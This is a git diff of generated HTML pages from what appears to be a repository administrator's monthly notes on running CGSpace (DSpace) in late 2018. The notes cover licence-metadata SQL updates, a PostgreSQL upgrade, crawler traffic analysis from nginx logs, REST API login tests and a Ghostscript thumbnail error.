    -UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
    -UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
    +
    UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
    +UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
    +UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
    +'%/by-nc%' AND text_value LIKE '%2.5%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
    +UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
    +UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
    +UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
    +UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
    +UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
     
    • I updated the fields on CGSpace and then started a re-index of Discovery
    • We also need to re-think the dc.rights field in the submission form: we should probably use a popup controlled vocabulary and list the Creative Commons values with version numbers and allow the user to enter their own (like the ORCID identifier field)
    • Ask Jane if we can use some of the BDP money to host AReS explorer on a more powerful server
    • IWMI sent me a list of new ORCID identifiers for their staff so I combined them with our list, updated the names with my resolve-orcids.py script, and regenerated the controlled vocabulary:
    -
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq >
    +
    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq >
     2018-10-17-orcids.txt
     $ ./resolve-orcids.py -i 2018-10-17-orcids.txt -o 2018-10-17-names.txt -d
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
    @@ -458,7 +458,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
     
  • I upgraded PostgreSQL to 9.6 on DSpace Test using Ansible, then had to manually migrate from 9.5 to 9.6:
  • # su - postgres
    -$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
    +$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
     $ exit
     # systemctl start postgresql
     # dpkg -r postgresql-9.5 postgresql-client-9.5 postgresql-contrib-9.5
    @@ -468,7 +468,7 @@ $ exit
     
  • Linode emailed me to say that CGSpace (linode18) had high CPU usage for a few hours this afternoon
  • Looking at the nginx logs around that time I see the following IPs making the most requests:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Oct/2018:(12|13|14|15)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Oct/2018:(12|13|14|15)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         361 207.46.13.179
         395 181.115.248.74
         485 66.249.64.93
    @@ -491,14 +491,14 @@ $ exit
     $ sudo docker run --name my_solr -v ~/dspace/solr/statistics/conf:/tmp/conf -d -p 8983:8983 -t solr:5
     $ sudo docker logs my_solr
     ...
    -ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
    +ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics] Caused by: solr.IntField
     
    • Apparently a bunch of variable types were removed in Solr 5
    • So for now it’s actually a huge pain in the ass to run the tests for my dspace-statistics-api
    • Linode sent a message that the CPU usage was high on CGSpace (linode18) last night
    • According to the nginx logs around that time it was 5.9.6.51 (MegaIndex) again:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Oct/2018:(14|15|16)" | awk '{print $1}' | sort
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Oct/2018:(14|15|16)" | awk '{print $1}' | sort
      | uniq -c | sort -n | tail -n 10
         249 207.46.13.179
         250 157.55.39.173
    @@ -520,12 +520,12 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
     /var/log/nginx/oai.log:0
     /var/log/nginx/rest.log:0
     /var/log/nginx/statistics.log:0
    -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
    +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-10-20 | sort | uniq
     8915
     
    • Last month I added “crawl” to the Tomcat Crawler Session Manager Valve’s regular expression matching, and it seems to be working for MegaIndex’s user agent:
    -
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'"Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"'
    +
    $ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1' User-Agent:'"Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"'
     
    • So I’m not sure why this bot uses so many sessions — is it because it requests very slowly?
    @@ -539,7 +539,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
  • Change build.properties to use HTTPS for Handles in our Ansible infrastructure playbooks
  • We will still need to do a batch update of the dc.identifier.uri and other fields in the database:
  • -
    dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
    +
    dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
     
    • While I was doing that I found two items using CGSpace URLs instead of handles in their dc.identifier.uri so I corrected those
    • I also found several items that had invalid characters or multiple Handles in some related URL field like cg.link.reference so I corrected those too
    • @@ -547,7 +547,7 @@ ERROR: Error CREATEing SolrCore 'statistics': Unable to create core [statistics]
    • I deployed the changes on CGSpace, ran all system updates, and rebooted the server
    • Also, I updated all Handles in the database to use HTTPS:
    -
    dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
    +
    dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'http://', 'https://') WHERE resource_type_id=2 AND text_value LIKE 'http://hdl.handle.net%';
     UPDATE 76608
     
    • Skype with Peter about ToRs for the AReS open source work and future plans to develop tools around the DSpace ecosystem
    • @@ -560,20 +560,20 @@ UPDATE 76608
    • I emailed the MARLO guys to ask if they can send us a dump of rights data and Handles from their system so we can tag our older items on CGSpace
    • Testing REST login and logout via httpie because Felix from Earlham says he’s having issues:
    -
    $ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
    +
    $ http --print b POST 'https://dspacetest.cgiar.org/rest/login' email='testdeposit@cgiar.org' password=deposit
     acef8a4a-41f3-4392-b870-e873790f696b
     
    -$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
    +$ http POST 'https://dspacetest.cgiar.org/rest/logout' rest-dspace-token:acef8a4a-41f3-4392-b870-e873790f696b
     
    • Also works via curl (login, check status, logout, check status):
    -
    $ curl -H "Content-Type: application/json" --data '{"email":"testdeposit@cgiar.org", "password":"deposit"}' https://dspacetest.cgiar.org/rest/login
    +
    $ curl -H "Content-Type: application/json" --data '{"email":"testdeposit@cgiar.org", "password":"deposit"}' https://dspacetest.cgiar.org/rest/login
     e09fb5e1-72b0-4811-a2e5-5c1cd78293cc
    -$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
    -{"okay":true,"authenticated":true,"email":"testdeposit@cgiar.org","fullname":"Test deposit","token":"e09fb5e1-72b0-4811-a2e5-5c1cd78293cc"}
    -$ curl -X POST -H "Content-Type: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/logout
    -$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
    -{"okay":true,"authenticated":false,"email":null,"fullname":null,"token":null}%
    +$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
    +{"okay":true,"authenticated":true,"email":"testdeposit@cgiar.org","fullname":"Test deposit","token":"e09fb5e1-72b0-4811-a2e5-5c1cd78293cc"}
    +$ curl -X POST -H "Content-Type: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/logout
    +$ curl -X GET -H "Content-Type: application/json" -H "Accept: application/json" -H "rest-dspace-token: e09fb5e1-72b0-4811-a2e5-5c1cd78293cc" https://dspacetest.cgiar.org/rest/status
    +{"okay":true,"authenticated":false,"email":null,"fullname":null,"token":null}%
     
    • Improve the documentatin of my dspace-statistics-api
    • Email Modi and Jayashree from ICRISAT to ask if they want to join CGSpace as partners
    • diff --git a/docs/2018-11/index.html b/docs/2018-11/index.html index 9a757ae6a..936b41193 100644 --- a/docs/2018-11/index.html +++ b/docs/2018-11/index.html @@ -36,7 +36,7 @@ Send a note about my dspace-statistics-api to the dspace-tech mailing list Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage Today these are the top 10 IPs: "/> - + @@ -132,7 +132,7 @@ Today these are the top 10 IPs:
    • Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
    • Today these are the top 10 IPs:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1300 66.249.64.63
        1384 35.237.175.180
        1430 138.201.52.218
    @@ -152,7 +152,7 @@ Today these are the top 10 IPs:
     
    • They at least seem to be re-using their Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=84.38.130.177' dspace.log.2018-11-03
     342
     
    • 50.116.102.77 is also a regular REST API user
    • @@ -163,7 +163,7 @@ Today these are the top 10 IPs:
    • And it doesn’t seem they are re-using their Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=138.201.52.218' dspace.log.2018-11-03
     1243
     
    • Ah, we’ve apparently seen this server exactly a year ago in 2017-11, making 40,000 requests in one day…
    • @@ -171,7 +171,7 @@ Today these are the top 10 IPs:
    • Linode sent a mail that CGSpace (linode18) is using high outgoing bandwidth
    • Looking at the nginx logs again I see the following top ten IPs:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1979 50.116.102.77
        1980 35.237.175.180
        2186 207.46.13.156
    @@ -189,9 +189,9 @@ Today these are the top 10 IPs:
     
    • It’s making lots of requests, though actually it does seem to be re-using its Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
     8449
    -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03 | sort | uniq | wc -l
     1
     
    • Updated on 2018-12-04 to correct the grep command above, as it was inaccurate and it seems the bot was actually already re-using its Tomcat sessions
    • @@ -200,7 +200,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
    • I think it’s reasonable for a human to click one of those links five or ten times a minute…
    • To contrast, 78.46.89.18 made about 300 requests per minute for a few hours today:
    -
    # grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
    +
    # grep 78.46.89.18 /var/log/nginx/access.log | grep -o -E '03/Nov/2018:[0-9][0-9]:[0-9][0-9]' | sort | uniq -c | sort -n | tail -n 20
         286 03/Nov/2018:18:02
         287 03/Nov/2018:18:21
         289 03/Nov/2018:18:23
    @@ -232,7 +232,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
     
  • Linode emailed about the CPU load and outgoing bandwidth on CGSpace (linode18) again
  • Here are the top ten IPs active so far this morning:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        1083 2a03:2880:11ff:2::face:b00c
        1105 2a03:2880:11ff:d::face:b00c
        1111 2a03:2880:11ff:f::face:b00c
    @@ -246,15 +246,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-03
     
    • 78.46.89.18 is back… and it is still actually re-using its Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
     8765
    -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04 | sort | uniq | wc -l
     1
     
    • Updated on 2018-12-04 to correct the grep command and point out that the bot was actually re-using its Tomcat sessions properly
    • Also, now we have a ton of Facebook crawlers:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
         905 2a03:2880:11ff:b::face:b00c
         955 2a03:2880:11ff:5::face:b00c
         965 2a03:2880:11ff:e::face:b00c
    @@ -275,7 +275,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
     
    • They are really making shit tons of requests:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
     37721
     
    • Updated on 2018-12-04 to correct the grep command to accurately show the number of requests
    • @@ -286,7 +286,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
    • I will add it to the Tomcat Crawler Session Manager valve
    • Later in the evening… ok, this Facebook bot is getting super annoying:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "04/Nov/2018" | grep "2a03:2880:11ff:" | awk '{print $1}' | sort | uniq -c | sort -n
        1871 2a03:2880:11ff:3::face:b00c
        1885 2a03:2880:11ff:b::face:b00c
        1941 2a03:2880:11ff:8::face:b00c
    @@ -307,15 +307,15 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.89.18' dspace.log.2018-11-04
     
    • Now at least the Tomcat Crawler Session Manager Valve seems to be forcing it to re-use some Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04
     37721
    -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-04 | sort | uniq | wc -l
     15206
     
    • I think we still need to limit more of the dynamic pages, like the “most popular” country, item, and author pages
    • It seems these are popular too, and there is no fucking way Facebook needs that information, yet they are requesting thousands of them!
    -
    # grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
    +
    # grep 'face:b00c' /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c 'most-popular/'
     7033
     
    • I added the “most-popular” pages to the list that return X-Robots-Tag: none to try to inform bots not to index or follow those pages
    • @@ -325,20 +325,20 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
      • I wrote a small Python script add-dc-rights.py to add usage rights (dc.rights) to CGSpace items based on the CSV Hector gave me from MARLO:
      -
      $ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
      +
      $ ./add-dc-rights.py -i /tmp/marlo.csv -db dspace -u dspace -p 'fuuu'
       
      • The file marlo.csv was cleaned up and formatted in Open Refine
      • 165 of the items in their 2017 data are from CGSpace!
      • I will add the data to CGSpace this week (done!)
      • Jesus, is Facebook trying to be annoying? At least the Tomcat Crawler Session Manager Valve is working to force the bot to re-use its Tomcat sessions:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep -c "2a03:2880:11ff:"
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep -c "2a03:2880:11ff:"
       29889
      -# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
      +# grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05
       29763
      -# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
      +# grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11-05 | sort | uniq | wc -l
       1057
      -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep "2a03:2880:11ff:" | grep -c -E "(handle|bitstream)"
      +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Nov/2018" | grep "2a03:2880:11ff:" | grep -c -E "(handle|bitstream)"
       29896
       
      • 29,000 requests from Facebook and none of the requests are to the dynamic pages I rate limited yesterday!
      • @@ -403,8 +403,8 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a03:2880:11ff' dspace.log.2018-11
        • Testing corrections and deletions for AGROVOC (dc.subject) that Sisay and Peter were working on earlier this month:
        -
        $ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
        -$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
        +
        $ ./fix-metadata-values.py -i 2018-11-19-correct-agrovoc.csv -f dc.subject -t correct -m 57 -db dspace -u dspace -p 'fuu' -d
        +$ ./delete-metadata-values.py -i 2018-11-19-delete-agrovoc.csv -f dc.subject -m 57 -db dspace -u dspace -p 'fuu' -d
         
        • Then I ran them on both CGSpace and DSpace Test, and started a full Discovery re-index on CGSpace:
        @@ -497,7 +497,7 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
      • Linode alerted me that the outbound traffic rate on CGSpace (linode19) was very high
      • The top users this morning are:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Nov/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           229 46.101.86.248
           261 66.249.64.61
           447 66.249.64.59
      diff --git a/docs/2018-12/index.html b/docs/2018-12/index.html
      index 1b2970508..9ed7660e5 100644
      --- a/docs/2018-12/index.html
      +++ b/docs/2018-12/index.html
      @@ -36,7 +36,7 @@ Then I ran all system updates and restarted the server
       
       I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
       "/>
      -
      +
       
       
           
      @@ -135,8 +135,8 @@ I noticed that there is another issue with PDF thumbnails on CGSpace, and I see
       
      • The error when I try to manually run the media filter for one item from the command line:
      -
      org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
      -org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
      +
      org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
      +org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-12989PcFN0DnJOej7%d" "-f/tmp/magick-129895Bmp44lvUfxo" "-f/tmp/magick-12989C0QFG51fktLF"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
               at org.im4java.core.Info.getBaseInfo(Info.java:360)
               at org.im4java.core.Info.<init>(Info.java:151)
               at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
      @@ -158,13 +158,13 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
       
    • For what it’s worth, I get the same error on my local Arch Linux environment with Ghostscript 9.26:
    $ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
    -DEBUG: FC_WEIGHT didn't match
    +DEBUG: FC_WEIGHT didn't match
     zsh: segmentation fault (core dumped)  gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
     
    • When I replace the pngalpha device with png16m as suggested in the StackOverflow comments it works:
    $ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
    -DEBUG: FC_WEIGHT didn't match
    +DEBUG: FC_WEIGHT didn't match
     
    • Start proofing the latest round of 226 IITA archive records that Bosede sent last week and Sisay uploaded to DSpace Test this weekend (IITA_Dec_1_1997 aka Daniel1807)
        @@ -203,7 +203,7 @@ DEBUG: FC_WEIGHT didn't match
      $ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
       Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf[0]=>Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf PDF 595x841 595x841+0+0 16-bit sRGB 107443B 0.000u 0:00.000
